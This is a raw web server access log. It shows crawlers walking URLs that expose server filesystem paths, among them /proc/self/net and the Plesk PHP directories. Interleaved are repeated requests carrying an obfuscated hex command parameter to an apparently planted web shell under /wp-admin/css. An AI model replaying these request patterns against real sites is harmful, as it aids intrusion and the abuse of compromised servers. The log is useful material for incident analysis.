74.7.227.128 - - [06/Nov/2025:01:28:41 +0700] "GET /shopbrand1093555954?path=//lib/tuned HTTP/2" 200 3354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:28:45 +0700] "GET /shopbrand1093707564?path=//lib/kernel HTTP/2" 200 2790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [06/Nov/2025:01:28:47 +0700] "GET /shopbrand51181914?kg=0051070866 HTTP/1.1" 200 24737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:01:28:48 +0700] "GET /shopbrand1093762447?path=//run/cagefs HTTP/2" 200 2792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:26:51 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303831312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373231312q3862363635626230653433386239353462613535326463306364613332353333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:28:54 +0700] "GET /shopbrand1093762447?path=//lib/kernel HTTP/2" 200 2790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:28:57 +0700] "GET /shopbrand1093488824?path=//opt/plesk HTTP/2" 200 2779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:04 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/comm&path=//proc/self HTTP/2" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:08 +0700] "GET /shopbrand1093555954?path=//proc/self/net HTTP/2" 200 3058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:27:13 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303833332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373233332q6361326234636136386663623936643239343734643739663332353661303336222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:29:14 +0700] "GET /shopbrand1093707564?path=//run/cagefs HTTP/2" 200 2792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:17 +0700] "GET /shopbrand1093555954?path=//var/www HTTP/2" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:23 +0700] "GET /shopbrand1093762447?path=//lib64/NetworkManager/1.18.8-2.el7_9 HTTP/2" 200 2985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:27 +0700] "GET /shopbrand1093488824?fileloc=//bin/fc-query&path=//bin HTTP/2" 200 6425 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:33 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/tcp&path=//proc/self/net HTTP/2" 200 9971 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:27:36 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303835362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373235362q3464633637623833386234326238616266626337366261363663663637343939222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:29:38 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/raw&path=//proc/self/net HTTP/2" 200 2570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:41 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/udp&path=//proc/self/net HTTP/2" 200 2774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:46 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/unix&path=//proc/self/net HTTP/2" 200 6300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:50 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php HTTP/2" 200 2972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:29:56 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/tcp6&path=//proc/self/net HTTP/2" 200 3093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:27:58 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303837382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373237382q6637363863313534346233646262653839313264353936383530316665633632222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:29:59 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/udp6&path=//proc/self/net HTTP/2" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:05 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/dev&path=//proc/self/net HTTP/2" 200 2707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:10 +0700] "GET /shopbrand1093555954?path=//proc/self/net/stat HTTP/2" 200 2548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:16 +0700] "GET /shopbrand1093555954?fileloc=//proc/self/net/raw6&path=//proc/self/net HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:28:20 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303930302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373330302q6135313738343137313138326531313161363661643031666661393236613736222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:30:21 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.3 HTTP/2" 200 2797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:27 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.2 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:30 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.4 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:37 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.0 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:41 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.1 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:28:42 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303932322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373332322q3236363037333339313239666330353663326463313065346338653264373733222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:30:44 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.4 HTTP/2" 200 2798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.4 - - [06/Nov/2025:01:30:44 +0700] "GET /shopbrand546060677?kg=0544871462 HTTP/1.1" 200 26175 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:01:30:47 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.2/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [06/Nov/2025:01:30:52 +0700] "GET /shopbrand48074155?kg=0047969878 HTTP/1.1" 200 25075 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:01:30:53 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.6 HTTP/2" 200 2797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:30:56 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.3/lib64 HTTP/2" 200 2804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:03 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.0/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:29:04 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303934342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373334342q6465326137396530346639376464323730386631316231336537653438643330222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:31:07 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.4/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:13 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/8.1/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:17 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.5 HTTP/2" 200 2797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:24 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.3 HTTP/2" 200 2797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:29:26 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303936362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373336362q3437616562303431636361373336323937356131363336613365333161353237222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:31:29 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.0 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:35 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.1 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:38 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.2 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:44 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.6/lib64 HTTP/2" 200 2805 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:29:48 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337303938382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373338382q3263303234383365616230366638376464633064353765353132343233346164222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:31:49 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.3/lib64 HTTP/2" 200 2804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:54 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.5/lib64 HTTP/2" 200 2804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:31:57 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.4 HTTP/2" 200 2796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:04 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.2/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:08 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.4/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:30:10 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313031302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373431302q3564383130613434343734613262623865363261646562336163366333646135222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:32:14 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.1/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:18 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/7.0/lib64 HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:24 +0700] "GET /shopbrand1093488824?path=//opt/plesk/php/5.4/lib64 HTTP/2" 200 2804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:27 +0700] "GET /shopbrand1093657736?path=//lib/exim HTTP/2" 200 2775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:33 +0700] "GET /shopbrand1093707564?path=//lib/grub HTTP/2" 200 2782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:30:34 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313033342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373433342q3766613137633562646232633461656164356461393831386466666439316564222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:32:37 +0700] "GET /shopbrand1093604023?path=//etc/mail HTTP/2" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:39 +0700] "GET /shopbrand1093657736?path=//etc/mail HTTP/2" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:46 +0700] "GET /shopbrand1093707564?path=//etc/skel HTTP/2" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:32:52 +0700] "GET /shopbrand1093762447?path=//proc/lve HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:30:56 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313035362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373435362q6161333063376166363663316131373765623133626364626238636162333735222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:32:57 +0700] "GET /shopbrand1093707564?path=//proc/lve HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:00 +0700] "GET /shopbrand1093657736?path=//lib/udev HTTP/2" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:06 +0700] "GET /shopbrand1093604023?path=//lib/udev HTTP/2" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:09 +0700] "GET /shopbrand1093762447?path=//etc/skel HTTP/2" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:15 +0700] "GET /shopbrand1093762447?path=//lib/grub HTTP/2" 200 2782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:31:18 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313037382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373437382q6435343837663634363562613038393833353864353333386662666338363266222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:33:21 +0700] "GET /shopbrand1093555954?path=//etc/default HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:25 +0700] "GET /shopbrand1093604023?path=//lib/exim HTTP/2" 200 2775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:28 +0700] "GET /shopbrand1093571503?fileloc=//lib64/gconv/SAMI-WS2.so&path=//lib64/gconv HTTP/2" 200 7272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:34 +0700] "GET /shopbrand1093604023?path=//lib64 HTTP/2" 200 42214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:38 +0700] "GET /shopbrand1093690126?path=//lib64 HTTP/2" 200 43626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:31:40 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313130302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373530302q6439666232376139653136663832343739643330323331626331353432613564222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:33:45 +0700] "GET /shopbrand1093488824?fileloc=//core.29754&path=/ HTTP/2" 200 2455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:49 +0700] "GET /shopbrand1093707564?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:55 +0700] "GET /shopbrand1093707564?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:33:59 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libkadm5srv_mit.so.11.0&path=//lib64 HTTP/2" 200 49035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:32:02 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313132322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373532322q3735346138313562336664663365623334393134363139373234373630306464222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:34:05 +0700] "GET /shopbrand1093690126?path=//lib64/libxslt-plugins HTTP/2" 200 2534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
